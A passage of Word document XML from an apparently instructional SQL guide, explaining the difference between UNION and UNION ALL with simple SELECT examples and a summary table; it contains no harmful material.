      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="65A154C7" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D5DE4A7"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B1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4619C4D7"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C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="5C74B18C" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="793E4CFA"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B2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="661C083B"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C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="057A6BAB" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CC3A34"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B3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CE19769"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C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="1F601221" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44812E67"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B4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ADDF07F"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C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43A4353C" w14:textId="77777777" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All 8 rows from both tables are combined in the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC7FB5" w14:textId="3C3DA3FD"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6C70BE33">
          <v:rect id="_x0000_i3054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D90974" w14:textId="0CF4702B" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="0025066D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="755" w:name="_Toc196308235"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between SQL Union and Union All</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="755"/>
    </w:p>
    <w:p w14:paraId="071C65D8" w14:textId="4EE14449" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Duplicate Rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677BCFFB" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Removes </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the result set. It only returns unique rows from the combined result of two queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6B916" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Does not remove duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It returns all rows, including duplicates, from the combined result of the two queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15573FDC"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F399D9C" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since UNION eliminates duplicates, it requires an additional operation to check for and remove duplicate rows. This can result in a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to UNION ALL, especially with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70603679" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: As it doesn't remove duplicates, it is generally </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616A0C4"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D224CC2" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use when you need a result set with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from both queries, without any duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E761E1" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use when you want to include </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including duplicates, in the result set. This is helpful when you want to preserve all the data from the queries as they are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2BF72"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08972F91" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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UNION Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08752A"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT column1 FROM TableA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E839B87"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F290FE"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT column1 FROM TableB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B118FF"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If TableA and TableB have duplicate values for column1, those duplicates will be removed from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18B55E" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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UNION ALL Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F2C2F8"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT column1 FROM TableA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E8C8C"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D29246"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT column1 FROM TableB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59428934"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Even if TableA and TableB have the same values in column1, all the rows will be included, including the duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689680CE" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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Summary of 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34"/>
        <w:gridCol w:w="3377"/>
        <w:gridCol w:w="4355"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="1E10DAE4" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D854C5" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36390606" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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UNION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A8E2C8" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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UNION ALL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="1D06C7AB" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07AA1434"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D5CB49"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Removes duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE4726D"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Includes duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="5A1AB5E1" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2826BF91"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="718FEC59"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Slower (due to duplicate elimination)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="396B07E5"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Faster (does not check for duplicates)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="671E747D" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC062D6"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689C8D5F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>When unique rows are required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E8695A"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>When all rows, including duplicates, are needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1535906C" w14:textId="58DA1AD9" w:rsidR="0025066D" w:rsidRPr="00CE4B95"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01A95979">
          <v:rect id="_x0000_i3055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F313E" w14:textId="491772C3" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00701CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="756" w:name="_Toc196308236"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="003A4D19" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
